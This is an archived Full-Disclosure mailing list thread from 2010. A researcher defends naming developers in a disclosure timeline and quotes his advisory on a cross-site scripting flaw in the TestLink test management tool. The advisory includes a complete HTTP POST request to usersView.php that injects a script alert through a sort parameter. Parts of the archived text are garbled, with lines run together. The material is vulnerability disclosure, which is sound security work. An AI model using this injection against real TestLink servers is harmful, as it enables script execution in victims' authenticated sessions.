[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Cross site scriping Vulnerabilites in Testlink TestManagement and Execution System
- To: <jeffwillis30@xxxxxxxxx>
- Subject: Re: [Full-disclosure] Cross site scriping Vulnerabilites in Testlink TestManagement and Execution System
- From: "Prashant" <clickprashant@xxxxxxxxxxxxxx>
- Date: 15 Jan 2010 18:26:43 -0000
Jeff ,
I dont know its right or wrong to disclose developer name in a timeline but
some times it helps finding the contact points of the vendor from old mail
archive and in my case it did help. I know its debatable ..
There are lots of advisories which had used timelines and these have been
released by reputed companies.
http://lists.grok.org.uk/pipermail/full-disclosure/2009-December/071923.html
http://lists.grok.org.uk/pipermail/full-disclosure/2009-October/071052.html
If Vendor is big company i guess its not a good idea to state Vendor name in
timeline. But if vendor is opensource then i guess there is no harm giving
developer name in timeline .Getting contact point of open source softwares can
some times be painful.
Btw that i know there is no real world revelance of and exploit for XSS which
triggers a jscript alert. The POC which i gave with this advisory was just to
Verify the issue as this particular XSS can only be exploited with an
"Authenticated HTTP POST"
On Fri, 15 Jan 2010 18:29:09 +0530 wrote
>Prashant,Usually we do not mention the engineer/dev name's in a timeline,
>that's totaly a jackass move.Anyone civilized would mention in this case :
>"{DATE} says "
Btw posting an "exploit" to trigger a Js alert, it's priceless; Dude you made
my night. 2010/1/15 Prashant
1.Title :Cross site scriping Vulnerabilites in Testlink TestManagement and
Execution System.
Discovered by: Prashant Khandelwal (clickprashant@xxxxxxxxx)
2.Vulnerability Information
Class: Cross site scriping
Impact :Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
3. Vulnerable packages.
Versions affected :All versions ">alert(726367128870)%3B
Request
POST /testlink/lib/usermanagement/usersView.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
Host: x.x.x.x
Content-Length: 146
Cookie:
PHPSESSID=8ea021778858f826c5aab8be8f38868c;TL_lastTestProjectForUserID_1=2381
Connection: Close
Pragma: no-cache
operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(726367128870)%3B&user_order_by=order_by_login
5. Proof Of Concept
======================
#!/usr/bin/env bash
# Prashant Khandelwal [clickprashant@xxxxxxxxx]
# Cross site scripting in Testlink the Test Management Tool
# Vendor : Testlink http://www.teamst.org
# Affected Version : userView.php
echo "Please open userView.php in browser a java script alert with text
123456789 should pop up"
=====================
6. Report Timeline
I) 5-Jan-2010
Vulnerability dicovered
II) 11-Jan-2010
Notified about the vulnerability to the developer Francisco Mancardi &
Martin Havlat from testlink team
IV) 11-Jan-2010
Francisco Mancardi ask for POC.
V) 14-Jan-2010
POC's given
VI) 15-Jan-2010
Francisco Mancardi says these vulnerabilities cannot be patched at the
moment and has not commited any timeline for fixing the same.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/